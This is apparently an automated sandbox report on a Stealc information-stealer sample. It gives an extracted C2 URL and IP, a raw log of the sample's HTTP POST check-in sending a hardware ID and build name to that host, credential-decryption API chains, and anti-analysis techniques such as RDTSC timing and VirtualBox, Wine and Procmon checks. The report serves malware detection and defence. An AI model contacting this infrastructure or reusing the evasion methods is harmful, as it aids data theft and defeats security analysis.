Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1529339
MD5: 02978bae9becb20a4ba6f439f8eb552f
SHA1: 728da10f79bc011ea19ca78aa8aae0b9946f9f4b
SHA256: 669036c06a6fd0494eb7db1eac48d0a477a47d7fff54dcc29fdbf7876ef39900
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 02978BAE9BECB20A4BA6F439F8EB552F)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6584 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6584 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.e40000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T21:42:18.802712+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49727 | 185.215.113.37 | 80 | TCP

                AV Detection

                Source: file.exeAvira: detected
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: 0.2.file.exe.e40000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E4C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E49AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E49AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E47240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E47240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E49B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E49B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E58EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E58EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E54910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E4E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E54570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E4ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E53EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F68A FindFirstFileA,0_2_00E4F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4DE10

                Networking

                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49727 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 36 42 39 38 41 36 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="hwid"B7C6B98A619D1524750037------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="build"doma------BGCBGCAFIIECBFIDHIJK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E44880
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 36 42 39 38 41 36 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="hwid"B7C6B98A619D1524750037------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="build"doma------BGCBGCAFIIECBFIDHIJK--
                Source: file.exe, 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/U
                Source: file.exe, 00000000.00000002.2208867559.0000000001D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpK
                Source: file.exe, 00000000.00000002.2208867559.0000000001CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E60_2_012181E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012158070_2_01215807
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012130B20_2_012130B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121B8890_2_0121B889
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120FB280_2_0120FB28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D8B440_2_010D8B44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B23D60_2_011B23D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121D3D50_2_0121D3D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120EA760_2_0120EA76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D35020_2_011D3502
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012115020_2_01211502
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01281D4E0_2_01281D4E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01115D760_2_01115D76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01219D5C0_2_01219D5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01187C5C0_2_01187C5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F775B0_2_010F775B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F563D0_2_010F563D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AC6930_2_010AC693
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111D6D30_2_0111D6D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121EEE20_2_0121EEE2
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: gklmxpts ZLIB complexity 0.9951693297511313
                Source: file.exeStatic PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E58680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00E58680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E53720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q36JKFCE.htm
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exeStatic file information: File size 1853440 > 1048576
                Source: file.exeStatic PE information: Raw size of gklmxpts is bigger than: 0x100000 < 0x19e600

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gklmxpts:EW;csoyoskk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gklmxpts:EW;csoyoskk:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E59860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ce078 should be: 0x1c8fa5
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: gklmxpts
                Source: file.exeStatic PE information: section name: csoyoskk
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 push ebx; mov dword ptr [esp], edi0_2_01248BB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 push edx; mov dword ptr [esp], 3AFF6CE1h0_2_01248C9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 push esi; mov dword ptr [esp], 5DBA2B70h0_2_01248CD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 push ecx; mov dword ptr [esp], 387B7703h0_2_01248D18
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push 03BF3C18h; mov dword ptr [esp], ebp0_2_0132EDE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push ebx; mov dword ptr [esp], ecx0_2_0132EF37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push 6A93C5E8h; mov dword ptr [esp], ebx0_2_0132EFFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push 74456157h; mov dword ptr [esp], ecx0_2_0132F002
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push edx; mov dword ptr [esp], ecx0_2_0132F058
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130191F push 5534F719h; mov dword ptr [esp], ebx0_2_01301944
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012E916F push 45E9B3DDh; mov dword ptr [esp], eax0_2_012E92A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122C1B9 push esi; mov dword ptr [esp], eax0_2_0122C218
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push esi; mov dword ptr [esp], edi0_2_012181EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push ecx; mov dword ptr [esp], 5BDDE026h0_2_01218274
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push esi; mov dword ptr [esp], 72AD7D47h0_2_01218314
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push edx; mov dword ptr [esp], eax0_2_0121834A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push eax; mov dword ptr [esp], 7FFFBD50h0_2_01218390
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push edx; mov dword ptr [esp], esp0_2_012184BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push edx; mov dword ptr [esp], edi0_2_012184DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 43A96438h; mov dword ptr [esp], ebx0_2_01218588
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push esi; mov dword ptr [esp], eax0_2_012185D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 4EB4D7FFh; mov dword ptr [esp], edx0_2_01218631
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push ecx; mov dword ptr [esp], 75DFE4D1h0_2_01218687
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 67479BC0h; mov dword ptr [esp], ebp0_2_01218716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 16503C8Ch; mov dword ptr [esp], ebp0_2_0121879A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 4593BADCh; mov dword ptr [esp], edx0_2_012187D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 0DBA74D9h; mov dword ptr [esp], ecx0_2_012187DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push ebp; mov dword ptr [esp], ecx0_2_01218813
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push esi; mov dword ptr [esp], eax0_2_012188CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push edi; mov dword ptr [esp], ebx0_2_01218927
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 329181FCh; mov dword ptr [esp], ebx0_2_01218945
                Source: file.exeStatic PE information: section name: gklmxpts entropy: 7.955274531054208

                Boot Survival

                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E59860

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13406
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160B8 second address: 12160D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E62h 0x00000007 pushad 0x00000008 jne 00007F39A52A2E56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160D5 second address: 12160DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224AFF second address: 1224B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E67h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224B23 second address: 1224B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D0h 0x00000009 pop eax 0x0000000a ja 00007F39A52A77CEh 0x00000010 popad 0x00000011 push edx 0x00000012 jmp 00007F39A52A77D6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224B61 second address: 1224B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224C86 second address: 1224C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224C8A second address: 1224C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224C95 second address: 1224CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224CB0 second address: 1224CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F39A52A2E63h 0x00000009 jp 00007F39A52A2E56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224CCD second address: 1224CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F39A52A77CEh 0x00000010 jp 00007F39A52A77C6h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122511C second address: 122512C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F39A52A2E56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12160B4 second address: 12160B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227C6B second address: 1227C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
